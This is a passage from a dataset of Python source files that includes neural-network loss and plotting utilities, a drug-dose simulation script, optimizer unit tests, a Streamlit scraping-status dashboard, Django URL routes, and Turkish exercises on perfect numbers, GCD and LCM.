markersize=3)\n\t\t\t\tax12.plot(epoch_i, loss_i[:,1], \".\", color=colors[i%2], markersize=3)\n\t\t\t\tax13.plot(epoch_i, loss_i[:,2], \".\", color=colors[i%2], markersize=3)\n\t\t\t\te_p0 = np.array([[epoch_i[p], loss_i[p,0]] for p in range(len(patience_i)) if patience_i[p] != 10])\n\t\t\t\te_p1 = np.array([[epoch_i[p], loss_i[p,1]] for p in range(len(patience_i)) if patience_i[p] != 10])\n\t\t\t\te_p2 = np.array([[epoch_i[p], loss_i[p,2]] for p in range(len(patience_i)) if patience_i[p] != 10])\n\t\t\t\tif len(e_p0) != 0:\n\t\t\t\t\tax11.plot(e_p0[:,0], e_p0[:,1], \".\", color=\"black\", markersize=3)\n\t\t\t\tif len(e_p1) != 0:\n\t\t\t\t\tax12.plot(e_p1[:,0], e_p1[:,1], \".\", color=\"black\", markersize=3)\n\t\t\t\tif len(e_p2) != 0:\n\t\t\t\t\tax13.plot(e_p2[:,0], e_p2[:,1], \".\", color=\"black\", markersize=3)\n\n\t\t# SAVE PLOT\n\t\tfig1.tight_layout()\n\t\tfig1.savefig(self.plot_loss + \".pdf\", format=\"pdf\", bbox_inches='tight')\n\n\t\tplt.cla()\n\t\tfig1.clf()\n\t\tdel ax11, fig1\n\n\t\treturn None\n\n\tdef plot_complete(self):\n\t\t\"\"\"\n\t\tloss, patience = torch.load()\n\t\tlen(loss) = nº restarts\n\t\tlen(loss[i]) = nº epochs in each restart\n\t\tlen(loss[i][j]) = nº of losses in this model\n\t\t(same for patience)\n\n\t\t\t\tALL RESTART1 ... RESTARTN\n\t\tLOSS1\n\t\t...\n\t\tLOSSN\n\n\t\t\"\"\"\n\t\t# CHECKING\n\t\tplt.cla()\n\t\tif len(self.loss_graph) == [[]]: \n\t\t\terror = self.load_data()\n\t\t\tif error != None: return error\n\t\tif len(self.loss_graph) == [[]]: return \"ERROR (TRAINING_LOSS.plot_complete): Empty data\"\n\n\t\tloss, patience = self.loss_graph, self.patience_graph\n\t\tif loss == [[]]: return\n\t\tif len(loss[-1])==0: loss=loss[:-1]; patience=patience[:-1]\n\n\t\t#DATA\n\t\tNrestarts = len(loss)\n\t\tNlosses = len(loss[0][0])\n\t\tloss = [np.array(loss_i) for loss_i in loss]\n\t\tcolors = [\"blue\", \"red\"]\n\t\tepoch = [np.array(range(len(loss[0]))) + 1]\n\t\tfor i in np.arange(1, len(loss)): \n\t\t\tepoch += [np.array(range(len(loss[i]))) + epoch[-1][-1] + 1]\n\n\t\t# CREATES AXES\n\t\tfig1 = plt.figure(4, figsize=[7*(Nrestarts + 1),5*Nlosses])\n\t\taxes = []\n\t\tfor i in range(Nlosses*(Nrestarts+1)):\n\t\t\taxes += [fig1.add_subplot(Nlosses, Nrestarts+1, i+1)]\n\n\t\t# SETS AXES LIMITS\n\t\taxes_i = 0\n\t\tfor i in range(Nlosses):\n\t\t\taxes[axes_i].set_xlim(epoch[0][0], epoch[-1][-1])\n\t\t\taxes_i += 1\n\t\t\tfor j in np.arange(1, Nrestarts+1, 1):\n\t\t\t\taxes[axes_i].set_xlim(epoch[j-1][0], epoch[j-1][-1])\n\t\t\t\taxes_i += 1\n\n\t\taxes_i = 0\n\t\tfor i in range(Nlosses):\n\t\t\t# PLOT ALL\n\t\t\tfor j in range(Nrestarts):\n\t\t\t\taxes[axes_i].plot(epoch[j], loss[j][:,i], \"-\", color=colors[j%2], linewidth=1)\n\t\t\t\taxes[axes_i].plot(epoch[j], loss[j][:,i], \".\", color=colors[j%2], markersize=3)\n\t\t\t\te_p = np.array([[epoch[j][p], loss[j][p,i]] for p in range(len(patience[j])) if patience[j][p] != 10])\n\t\t\t\tif len(e_p) != 0:\n\t\t\t\t\taxes[axes_i].plot(e_p[:,0], e_p[:,1], \".\", color=\"black\", markersize=3)\n\t\t\taxes_i += 1\n\n\t\t\tfor j in range(Nrestarts):\n\t\t\t\t# PLOT RESTART_i\n\t\t\t\taxes[axes_i].plot(epoch[j], loss[j][:,i], \"-\", color=colors[j%2], linewidth=1)\n\t\t\t\taxes[axes_i].plot(epoch[j], loss[j][:,i], \".\", color=colors[j%2], markersize=3)\n\t\t\t\te_p = np.array([[epoch[j][p], loss[j][p,i]] for p in range(len(patience[j])) if patience[j][p] != 10])\n\t\t\t\tif len(e_p) != 0:\n\t\t\t\t\taxes[axes_i].plot(e_p[:,0], e_p[:,1], \".\", color=\"black\", markersize=3)\n\t\t\t\taxes_i += 1\n\n\t\t# SAVE PLOT\n\t\tfig1.tight_layout()\n\t\tfig1.savefig(self.plot_loss_complete + \".pdf\", format=\"pdf\", bbox_inches='tight')\n\n\t\tplt.cla()\n\t\tfig1.clf()\n\t\tdel axes, fig1\n\n\t\treturn None\n\n##############################################################################################################\n\nclass LOSS():\n\t\"\"\"\n\tLoss functions for the optimizer of the model. \n\t\"\"\"\n\tdef __init__(self, mymodel):\n\t\tself.Nsongs = mymodel.Nsongs\n\t\tself.beta = mymodel.beta\n\t\tself.dim = mymodel.dim\n\t\tself.BCELoss = torch.nn.BCELoss() # default reduction=mean\n\t\tself.GAUSS_CTE = -0.5*self.dim[-1]*np.log(2*np.pi).item()\n\t\tself.weight_epoch = lambda epoch: [1.,self.beta] # weights for losses in function of the epoch\n\t\treturn\n\n\tdef BCE_loss(self, y, ynew, pars):\n\t\ty = y.float()\n\t\tynew = ynew.float()\n\t\tynew = torch.sigmoid(ynew) #+ 1E-10 #from 0 to 1 for log\n\t\tloss = self.BCELoss(ynew, y)*self.Nsongs #input, target\n\t\treturn [loss, torch.Tensor([loss.item()])]\n\n\tdef BCE_loss2(self, y, ynew, pars):\n\t\ty = y.float()\n\t\tynew = ynew.float()\n\t\tynew = torch.sigmoid(ynew) #+ 1E-10 #from 0 to 1 for log\n\t\tloss = -torch.sum(y*torch.log(ynew + 1E-10) + (1-y)*torch.log(1-ynew + 1E-10), 1) / y.sum(1)\n\t\treturn [torch.mean(loss), torch.Tensor([torch.mean(loss).item()])]\n\n\tdef CE_loss(self, y, ynew, pars):\n\t\ty = y.float()\n\t\tynew = ynew.float()\n\t\tynew = torch.softmax(ynew, 1) #normalization for ynew being a pdf\n\t\tloss = -torch.sum(y*torch.log(ynew + 1E-10), 1)/y.sum(1)\n\t\treturn [torch.mean(loss), torch.Tensor([torch.mean(loss).item()])]\n\n\tdef BCEKLD_loss(self, y, ynew, pars, epoch=1):\n\t\tmu, logvar = pars\n\t\tlossBCE = self.weight_epoch(epoch)[0]*self.BCE_loss(y, ynew, pars)[0]\n\t\tlossKLD = self.weight_epoch(epoch)[1]*(-0.5*torch.sum(1 + logvar - mu.pow(2) - logvar.exp(), 1)).mean()\n\t\treturn [lossBCE + lossKLD, torch.Tensor([lossBCE.item(), lossKLD.item(), lossBCE.item() + lossKLD.item()])]\n\n\tdef BCEKLD_loss2(self, y, ynew, pars, epoch=1):\n\t\tmu, logvar = pars\n\t\tlossBCE = self.weight_epoch(epoch)[0]*self.BCE_loss2(y, ynew, pars)[0]\n\t\tlossKLD = self.weight_epoch(epoch)[1]*(-0.5*torch.sum(1 + logvar - mu.pow(2) - logvar.exp(), 1)).mean()\n\t\treturn [lossBCE + lossKLD, torch.Tensor([lossBCE.item(), lossKLD.item(), lossBCE.item() + lossKLD.item()])]\n\n\tdef CEKLD_loss(self, y, ynew, pars, epoch=1):\n\t\tmu, logvar = pars\n\t\tlossCE = self.weight_epoch(epoch)[0]*self.CE_loss(y, ynew, pars)[0]\n\t\tlossKLD = self.weight_epoch(epoch)[1]*(-0.5*torch.sum(1 + logvar - mu.pow(2) - logvar.exp(), 1)).mean()\n\t\treturn [lossCE + lossKLD, torch.Tensor([lossCE.item(), lossKLD.item(), lossCE.item() + lossKLD.item()])]\n\n\tdef FLOW_loss(self, y, h, logdet): #y, ynew, pars\n\t\tsize = h.size()[1]\n\t\tlossp = (self.GAUSS_CTE - 0.5*h.pow(2).sum(1).mean())/size #sum all dim elements, mean for all batches\n\t\tlossdet = logdet/size\n\t\treturn [- lossp - lossdet, torch.Tensor([- lossp.item(), -lossdet.item(), - lossp.item() - lossdet.item()])]\n\n\tdef FOCAL_loss(self, y, x, pars): #y, ynew, pars\n\t\talpha = 0.25 #controls data imbalance, 0.5 if balanced\n\t\tgamma = 2.0\n\n\t\tt = y.float()\n\n\t\tp = x.sigmoid().detach()\n\t\tpt = p*t + (1-p)*(1-t) # pt = p if t > 0 else 1-p\n\t\tw = alpha*t + (1-alpha)*(1-t) # w = alpha if t > 0 else 1-alpha\n\t\tw = w * (1-pt).pow(gamma)\n\t\tloss = torch.nn.functional.binary_cross_entropy_with_logits(x, t, w, reduction='mean') #input, target, weight\n\t\tloss = loss*self.Nsongs\n\t\treturn [loss, torch.Tensor([loss.item()])]\n\n\tdef FOCAL_loss2(self, y, x, pars): #y, ynew, pars\n\t\talpha = 0.25 #controls data imbalance, 0.5 if balanced\n\t\tgamma = 2.0\n\n\t\tt = y.float()\n\t\tx = torch.sigmoid(x.float())\n\n\t\tp = x.detach()\n\t\tpt = p*t + (1-p)*(1-t) # pt = p if t > 0 else 1-p\n\t\tw = alpha*t + (1-alpha)*(1-t) # w = alpha if t > 0 else 1-alpha\n\t\tw = w * (1-pt).pow(gamma)\n\t\tloss = -torch.sum(w*(t*torch.log(x + 1E-10) + (1-t)*torch.log(1-x + 1E-10)), 1) / t.sum(1)\n\t\treturn [torch.mean(loss), torch.Tensor([torch.mean(loss).item()])]\n\n\tdef FOCALKLD_loss(self, y, x, pars, epoch=1): #y, ynew, pars\n\t\tmu, logvar = pars #VAE\n\t\tlossF = self.weight_epoch(epoch)[0]*self.FOCAL_loss(y, x, pars)[0]\n\t\tlossKLD = self.weight_epoch(epoch)[1]*(-0.5*torch.sum(1 + logvar - mu.pow(2) - logvar.exp(), 1)).mean()\n\t\treturn [lossF + lossKLD, torch.Tensor([lossF.item(), lossKLD.item(), lossF.item() + lossKLD.item()])]\n\n\tdef FOCALKLD_loss2(self, y, x, pars, epoch=1): #y, ynew, pars\n\t\tmu, logvar = pars #VAE\n\t\tlossF = self.weight_epoch(epoch)[0]*self.FOCAL_loss2(y, x, pars)[0]\n\t\tlossKLD = self.weight_epoch(epoch)[1]*(-0.5*torch.sum(1 + logvar - mu.pow(2) - logvar.exp(), 1)).mean()\n\t\treturn [lossF + lossKLD, torch.Tensor([lossF.item(), lossKLD.item(), lossF.item() + lossKLD.item()])]\n\n\tdef set_weight_epoch(self, f):\n\t\tself.weight_epoch = f\n\t\treturn\n\n##############################################################################################################","repo_name":"MarcSerraPeralta/rec-NN","sub_path":"main/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34008928538","text":"from OneCompartment.oral_dose_sims import one_comp_single_dose_simulation, one_comp_multi_dose_simulation, one_comp_multi_dose_sim_delay\n\nfrom simulation_plot import plot_single_dose_output, plot_multi_dose_output, plot_multi_dose_delay_output\n\nnum_days = 10\nnum_dose = 3\n\ninterval = 24\n# delay = np.zeros(num_dose - 1)\n\ndelay = [5, 0]\n\ndose_1 = 100\ndose_2 = [100, 0, 100]\n\nt0, C0 = one_comp_single_dose_simulation(num_days, [dose_1]*num_dose)\nplot_single_dose_output(t0, C0, (10,6), 'concentration', 'ng/mL', show_auc = True, show_max = True, tS=10, tC='inf')\n\nt1, C1 = one_comp_multi_dose_simulation(num_days, num_dose, interval, [dose_1]*num_dose)\nplot_multi_dose_output(t1, C1, num_dose, interval, (10,6), 'concentration', 'ng/mL', show_auc = True, show_max = True, tS=10, tC='inf')\n\nt2, C2 = one_comp_multi_dose_sim_delay(num_days, num_dose, interval, [dose_1]*num_dose, delay)\nplot_multi_dose_delay_output(t2, C2, num_dose, interval, delay, (10,6), 'concentration', 'ng/mL', show_auc = True, show_max = True, tS=10, tC='inf')\n\nt2, C2 = one_comp_multi_dose_simulation(num_days, num_dose, interval, dose_2)\nplot_multi_dose_output(t2, C2, num_dose, interval, (10,6), 'concentration', 'ng/mL', show_auc = True, show_max = True, tS=10, tC='inf')\n","repo_name":"kamaldeen91/qsp-modeling-with-python","sub_path":"OneCompartment/execute_one_comp_model.py","file_name":"execute_one_comp_model.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"25594024711","text":"import random\nfrom unittest import TestCase\nfrom unittest.mock import patch\n\nimport matplotlib.pyplot as plt\nimport networkx as nx\n\nfrom elbridge.evolution.chromosome import Chromosome\nfrom elbridge.evolution.objectives import PopulationEquality\nfrom elbridge.evolution.search import find_best_neighbor, optimize\n\n\nclass SearchTest(TestCase):\n def setUp(self):\n self.master_graph = nx.Graph()\n nx.add_path(self.master_graph, [0, 1, 2])\n nx.add_path(self.master_graph, [5, 6, 7])\n nx.add_path(self.master_graph, [2, 3, 4, 5])\n self.master_graph.graph['order'] = {i: i for i in range(8)}\n self.master_graph.graph['districts'] = 2\n nx.set_node_attributes(self.master_graph, {i: 1 for i in self.master_graph}, name='pop')\n self.master_graph = nx.freeze(self.master_graph)\n\n Chromosome.objectives = [PopulationEquality(self.master_graph)]\n\n self.m_tqdm_patch = patch('elbridge.evolution.search.tqdm')\n self.m_tqdm = self.m_tqdm_patch.start()\n self.m_tqdm.side_effect = lambda x, *y, **z: x\n\n def tearDown(self):\n self.m_tqdm_patch.stop()\n\n def test_find_best_neighbor_simple(self):\n master_graph = nx.path_graph(6)\n nx.set_node_attributes(master_graph, {i: 1 for i in master_graph}, name='pop')\n master_graph = nx.freeze(master_graph)\n Chromosome.objectives = [PopulationEquality(master_graph)]\n\n s1 = Chromosome(master_graph, [1, 1, 2, 2, 2, 2])\n s2 = find_best_neighbor(s1)\n\n self.assertEqual(s2.get_scores(), [0.0])\n self.assertEqual(s2.get_assignment(), [1, 1, 1, 2, 2, 2])\n\n s3 = find_best_neighbor(s2)\n self.assertIsNone(s3)\n\n def test_optimize_simple(self):\n master_graph = nx.path_graph(6)\n nx.set_node_attributes(master_graph, {i: 1 for i in master_graph}, name='pop')\n Chromosome.objectives = [PopulationEquality(master_graph)]\n\n chromosome = Chromosome(master_graph, [1, 2, 2, 2, 2, 2])\n best_state = optimize(chromosome)\n\n self.assertEqual(best_state.get_scores(), [0.0])\n self.assertEqual(best_state.get_assignment(), [1, 1, 1, 2, 2, 2])\n\n better_state = optimize(best_state)\n best_state.normalize()\n better_state.normalize()\n self.assertEqual(best_state, better_state)\n\n\nclass SearchLoadTest(TestCase):\n def tearDown(self):\n plt.close('all')\n\n def test_find_best_neighbor_complex(self):\n size = 1000\n\n master_graph = nx.path_graph(size)\n nx.set_node_attributes(master_graph, {i: 1 for i in range(2)}, name='pop')\n nx.set_node_attributes(master_graph, {i: 2 for i in range(2, size)}, name='pop')\n master_graph.graph['districts'] = 2\n\n Chromosome.objectives = [PopulationEquality(master_graph)]\n chromosome = Chromosome(master_graph, list(range(size)))\n\n new_chromosome = find_best_neighbor(chromosome, sample_size=size * 2)\n\n self.assertEqual(new_chromosome.get_scores(), [0])\n self.assertEqual(new_chromosome.get_assignment(), [1, 1] + list(range(2, size)))\n\n def test_optimize_moderately_complex(self):\n grid_size = [32, 32]\n node_count = grid_size[0] * grid_size[1]\n edge_count = (grid_size[0] - 1) * grid_size[1] + grid_size[0] * (grid_size[1] - 1)\n\n districts = 2\n assignment = random.choices(range(1, districts + 1), k=node_count)\n\n master_graph = nx.grid_graph(grid_size)\n nx.set_node_attributes(master_graph, {i: 1 for i in master_graph}, name='pop')\n master_graph.graph['districts'] = districts\n\n Chromosome.objectives = [PopulationEquality(master_graph)]\n chromosome = Chromosome(master_graph, assignment)\n\n best_state = optimize(chromosome, sample_size=edge_count * 2)\n self.assertTrue(best_state.dominates(chromosome))\n","repo_name":"rohan/elbridge","sub_path":"tests/genetics/test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":3859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31070100846","text":"import streamlit as st\nimport sqlalchemy\nimport pymysql\nimport datetime\nimport math\n\nfrom sqlalchemy import and_, or_\nfrom datetime import timedelta\n\n\n\nclass Singleton(type):\n\n\t# Referência: https://stackoverflow.com/questions/6760685/creating-a-singleton-in-python\n\t\n\t_instances = {}\n\n\tdef __call__(cls, *args, **kwargs):\n\n\t\tif cls not in cls._instances:\n\t\t\tcls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)\n\t\treturn cls._instances[cls]\n\n\n\n\nclass database(metaclass=Singleton):\n\n\t# Páginas importantes acessadas durante o desenvolvimento desta função.\n\t# \n\t# Exemplos SQLAlchemy — Python Tutorial\n\t# https://towardsdatascience.com/sqlalchemy-python-tutorial-79a577141a91\n\t# \n\t# Working with Engines and Connections [Acesso em 18 de julho de 2022]\n\t# https://docs.sqlalchemy.org/en/13/core/connections.html\n\t#\n\t# Using Connection Pools with Multiprocessing or os.fork() [Acesso em 18 de julho de 2022]\n\t# https://docs.sqlalchemy.org/en/13/core/pooling.html#pooling-multiprocessing\n\n\n\t__engine = None\n\n\t# Initializing \n\tdef __init__( self ):\n\n\t\tdialectdriver = 'mysql+pymysql'\n\n\t\tuser = st.secrets[\"user\"]\n\t\tpasswd = st.secrets[\"passwd\"]\n\t\thost = st.secrets[\"host\"]\n\t\tport = st.secrets[\"port\"]\n\t\tdatabase = st.secrets[\"db\"]\n\n\t\tconnectionString = '{dialectdriver}://{user}:{passwd}@{host}:{port}/{db}'.format( dialectdriver=dialectdriver, user=user, passwd=passwd, host=host, port=port, db=database )\n\n\t\tself.__engine = sqlalchemy.create_engine( connectionString )\n\n\n\tdef getEngine(self):\n\t\treturn self.__engine\n\n\n\n\n\ndef consultaTotalCEPsDistintosJaProcessadosNasUltimasHoras( ultimasHoras ):\n\n\t# Páginas importantes acessadas durante o desenvolvimento desta função.\n\t# Acesso em 27 de julho de 2022\n\t# \n\t# Group by and count function in SQLAlchemy\n\t# https://www.geeksforgeeks.org/group-by-and-count-function-in-sqlalchemy/\n\t#\n\t# Query.scalar()\n\t# https://docs.sqlalchemy.org/en/14/orm/query.html#sqlalchemy.orm.query.Query.scalar\n\t#\n\t# SQLAlchemy: print the actual query\n\t# https://stackoverflow.com/questions/5631078/sqlalchemy-print-the-actual-query\n\t#\n\t# Conjunctions\n\t# https://docs.sqlalchemy.org/en/14/core/tutorial.html#conjunctions\n\n\tmyDatabase = database()\n\tengine = myDatabase.getEngine()\n\n\twith engine.connect() as connection:\n\t\tmetadata = sqlalchemy.MetaData()\n\t\ttbCeps = sqlalchemy.Table('CEPs', metadata, autoload=True, autoload_with=engine)\n\n\t\tdt_now = datetime.datetime.now(datetime.timezone.utc)\n\t\td = dt_now - timedelta(hours=ultimasHoras)\n\n\t\tquery = sqlalchemy.select([sqlalchemy.func.count(sqlalchemy.func.distinct(tbCeps.columns.co_cep))])\\\n\t\t .where( and_( tbCeps.columns.statusProcessamento == 2, tbCeps.columns.fimRaspagem >= d ) )\n\t\t\n\t\tcount = connection.execute(query).scalar()\n\n\treturn count\n\n\n\n\ndef consultaTotalCEPsDistintos():\n\n\tmyDatabase = database()\n\tengine = myDatabase.getEngine()\n\n\twith engine.connect() as connection:\n\t\tmetadata = sqlalchemy.MetaData()\n\t\ttbCeps = sqlalchemy.Table('CEPs', metadata, autoload=True, autoload_with=engine)\n\n\t\tquery = sqlalchemy.select([sqlalchemy.func.count(sqlalchemy.func.distinct(tbCeps.columns.co_cep))])\n\t\tcount = connection.execute(query).scalar()\n\n\treturn count\n\n\n\n\ndef consultaTotalPlanosColetados():\n\n\tmyDatabase = database()\n\tengine = myDatabase.getEngine()\n\n\twith engine.connect() as connection:\n\t\tmetadata = sqlalchemy.MetaData()\n\t\ttbPlanos = sqlalchemy.Table('Planos', metadata, autoload=True, autoload_with=engine)\n\n\t\tquery = sqlalchemy.select([sqlalchemy.func.count(tbPlanos.columns.idPlano)])\n\t\tcount = connection.execute(query).scalar()\n\n\treturn count\n\n\n\n\n\n\nif __name__ == \"__main__\":\n\n\t# Páginas importantes acessadas durante o desenvolvimento desta função.\n\t# Acesso em 27 de julho de 2022\n\t# \n\t# Deploying a web app using MySQL server via Streamlit\n\t# https://medium.com/@itssaad.muhammad/deploying-a-web-app-using-mysql-server-via-streamlit-ca28ecd02bb0\n\t#\n\t# Python String Format Cookbook\n\t# https://mkaz.blog/code/python-string-format-cookbook/\n\n\tultima1h = consultaTotalCEPsDistintosJaProcessadosNasUltimasHoras(1)\n\tultima2h = consultaTotalCEPsDistintosJaProcessadosNasUltimasHoras(2)\n\tultima24h = consultaTotalCEPsDistintosJaProcessadosNasUltimasHoras(24)\n\tultima48h = consultaTotalCEPsDistintosJaProcessadosNasUltimasHoras(24 * 2)\n\tultima1s = consultaTotalCEPsDistintosJaProcessadosNasUltimasHoras(24 * 7)\n\tultima2s = consultaTotalCEPsDistintosJaProcessadosNasUltimasHoras(24 * 7 * 2)\n\tultimo365d = consultaTotalCEPsDistintosJaProcessadosNasUltimasHoras(24 * 365)\n\n\ttotalPlanosColetados = consultaTotalPlanosColetados()\n\ttotalCEPsDistintos = consultaTotalCEPsDistintos()\n\n\n\t#\n\t# Cálculo do percentual comparativo\n\t#\n\n\ttotalHora1 = ultima1h\n\ttotalHora2 = ultima2h - ultima1h\n\n\tif totalHora1 > totalHora2:\n\t\tdeltaUltima1h = (totalHora1 / totalHora2 - 1) * 100 if 0 != totalHora2 else math.inf\n\telse:\n\t\tdeltaUltima1h = (1 - totalHora1 / totalHora2) * 100 * -1 if 0 != totalHora2 else 0\n\n\tdeltaUltima1hStr = \"{:.2f} %\".format(round( deltaUltima1h, 2)) \n\n\n\n\ttotalHora1a24 = ultima24h\n\ttotalHora25a48 = ultima48h - ultima24h\n\n\tif totalHora1a24 > totalHora25a48:\n\t\tdeltaUltima24h = (totalHora1a24 / totalHora25a48 - 1) * 100 if 0 != totalHora25a48 else math.inf\n\telse:\n\t\tdeltaUltima24h = (1 - totalHora1a24 / totalHora25a48) * 100 * -1 if 0 != totalHora25a48 else 0\n\n\tdeltaUltima24hStr = \"{:.2f} %\".format(round( deltaUltima24h, 2))\n\n\n\n\ttotalSemana1 = ultima1s\n\ttotalSemana2 = ultima2s - ultima1s\n\n\tif totalSemana1 > totalSemana2:\n\t\tdeltaUltima1s = (totalSemana1 / totalSemana2 - 1) * 100 if 0 != totalSemana2 else math.inf\n\telse:\n\t\tdeltaUltima1s = (1 - totalSemana1 / totalSemana2) * 100 * -1 if 0 != totalSemana2 else 0\n\t \n\tdeltaUltima1sStr = \"{:.2f} %\".format(round( deltaUltima1s, 2)) \n\n\n\t\n\tporcentagemConcluida = (ultimo365d / totalCEPsDistintos) * 100\n\ttempoEstimadoEmDias = (totalCEPsDistintos - ultimo365d) / ultima24h\n\t\n\n\n\tst.title(\"Melhor Plano\")\n\tst.title(\"Status em tempo real da raspagem\")\n\tst.text(\"\")\n\n\tst.subheader(\"CEPs processados\") \n\tst.text(\"\")\n\t\n\tl1col1, l1col2, l1col3 = st.columns(3)\n\tl1col1.metric(label = \"Última hora\" , value = str(ultima1h) , delta = deltaUltima1hStr )\n\tl1col2.metric(label = \"Últimas 24 horas\" , value = str(ultima24h), delta = deltaUltima24hStr)\n\tl1col3.metric(label = \"Últimos 7 dias\" , value = str(ultima1s) , delta = deltaUltima1sStr )\n\n\tst.text(\"\")\n\tst.subheader(\"Outras métricas\") \n\tst.text(\"\")\n\t\n\tl2col1, l2col2, l2col3 = st.columns(3)\n\tl2col1.metric(label = \"Planos coletados\" , value = str(totalPlanosColetados) )\n\tl2col2.metric(label = \"Total de CEPs\" , value = str(totalCEPsDistintos) )\n\tl2col3.metric(label = \"CEPs processados\" , value = str(ultimo365d) )\n\t\n\n\tst.text(\"\")\n\tst.text(\"\")\n\tst.subheader(\"{:.2f}% dos CEPS já foram processados.\".format(porcentagemConcluida))\n\n\tmy_bar = st.progress(0)\n\tmy_bar.progress( int( porcentagemConcluida ) )\n\t\n\tst.text(\"\")\n\tst.text(\"\")\n\tst.subheader(\"Tempo estimado para conclusão: {:.1f} dias\".format( round(tempoEstimadoEmDias,1) ) )\n\tst.caption(\"Estimativa feita utilizando o total de CEPs processados nas últimas 24 horas.\")","repo_name":"eduardomiranda/streamlit-painel-raspagem","sub_path":"painel.py","file_name":"painel.py","file_ext":"py","file_size_in_byte":7120,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14177433374","text":"\"\"\"fashta URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom mainApp import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path(\"\",views.homePage,name=\"home\"),\n path(\"shop////\",views.shopPage,name=\"shop\"),\n path(\"shopDetails//\",views.shopDetailsPage,name=\"shopDetails\"),\n path(\"shoppingCart/\",views.shoppingCartPage,name=\"shoppingCart\"),\n path(\"checkOut/\",views.checkOutPage,name=\"checkOut\"),\n path(\"about/\",views.aboutPage,name=\"about_us\"),\n path(\"contact/\",views.contactPage,name=\"contact\"),\n path(\"login/\",views.loginPage,name=\"login\"),\n path(\"signup/\",views.signupPage,name=\"signup\"),\n path(\"logout/\",views.logoutView,name=\"logout\"),\n path(\"profile/\",views.profilePage,name=\"profile\"),\n path(\"update-profile/\",views.updateprofilePage,name=\"updateprofile\"),\n path(\"wishlist//\",views.mywishlist),\n path(\"delete-wishlist//\",views.deletewishlist)\n]+static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)","repo_name":"psychovaibh/Django_Projects","sub_path":"fashta/fashta/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1880977939","text":"import os\nfrom .class_app_file_io import *\n\n\nclass BuiltInFeature:\n def __init__(self, name):\n self.name = name\n self.infFile = None\n self.evtFile = None\n self.stcFile = None\n self.oboFile = None\n self.overviewImage = None\n\n def get_path_file_name(self, file_path):\n _path, _base_name = os.path.split(file_path)\n return _path, _base_name\n\n def get_inf_file_content(self):\n if self.infFile is not None:\n _io = ApplicationInfFileIO(*self.get_path_file_name(self.infFile))\n _io.read()\n return _io\n\n def get_evt_file_content(self):\n if self.evtFile is not None:\n _io = ApplicationEvtFileIO(*self.get_path_file_name(self.evtFile))\n _io.read()\n return _io\n\n def get_stc_file_content(self):\n if self.stcFile is not None:\n _io = ApplicationStcFileIO(*self.get_path_file_name(self.stcFile))\n _io.read()\n return _io\n\n def get_obo_file_content(self):\n if self.oboFile is not None:\n _io = ApplicationOboFileIO(*self.get_path_file_name(self.oboFile))\n _io.read()\n return _io\n","repo_name":"yiyunzhi/pxcmbt","sub_path":"application/class_builtin_features.py","file_name":"class_builtin_features.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10572058586","text":"\"\"\"\r\n1.ALIŞTIRMA\r\n1'den 1000'e kadar olan sayılardan mükemmel sayı olanları ekrana yazdırın. Bunun için bir sayının mükemmel olup olmadığını dönen bir tane fonksiyon yazın.\r\n\r\nBir sayının bölenlerinin toplamı kendine eşitse bu sayı mükemmel bir sayıdır. Örnek olarak 6 mükemmel bir sayıdır (1 + 2 + 3 = 6).\r\n\"\"\"\r\n\"\"\"\r\ndef mukemmel(sayi):\r\n\r\n toplam = 0\r\n\r\n for i in range(1,sayi):\r\n if(sayi % i == 0):\r\n toplam += i\r\n\r\n return toplam == sayi\r\n\r\nfor i in range(1,1001):\r\n if (mukemmel(i)):\r\n print(\"Mükemmel Sayılar:\",i)\r\n\"\"\"\r\n\r\n\"\"\"\r\n2.ALIŞTIRMA\r\nKullanıcıdan 2 tane sayı alarak bu sayıların en büyük ortak bölenini (EBOB) dönen bir tane fonksiyon yazın.\r\n\"\"\"\r\n\"\"\"\r\ndef ebob_bulma(sayi1,sayi2):\r\n \r\n i = 1\r\n ebob = 1\r\n \r\n while (i<=sayi1 and i<=sayi2):\r\n \r\n if (not (sayi1 % i) and not (sayi2 % i)):\r\n ebob = i\r\n i += 1\r\n return ebob\r\n\r\nsayi1 = int(input(\"1.Sayıyı Girin:\"))\r\nsayi2 = int(input(\"2.Sayıyı Girin:\"))\r\n\r\nprint(\"EBOB:\",ebob_bulma(sayi1,sayi2))\r\n\"\"\"\r\n\r\n\"\"\"\r\n3.ALIŞTIRMA\r\nKullanıcıdan 2 tane sayı alarak bu sayıların en küçük ortak katlarını (EKOK) dönen bir tane fonksiyon yazın.\r\n\"\"\"\r\n\"\"\"\r\ndef ekok_bulma(sayi1,sayi2):\r\n\r\n i = 2\r\n ekok = 1\r\n\r\n while True:\r\n\r\n if (sayi1 % i == 0 and sayi2 % i == 0):\r\n ekok *= i\r\n\r\n sayi1 //= i\r\n sayi2 //= i\r\n\r\n elif (sayi1 % i == 0 and sayi2 % i != 0):\r\n ekok *= i\r\n\r\n sayi1 //= i\r\n\r\n elif (sayi1 % i != 0 and sayi2 % i == 0):\r\n ekok *= i\r\n\r\n sayi2 //= i\r\n 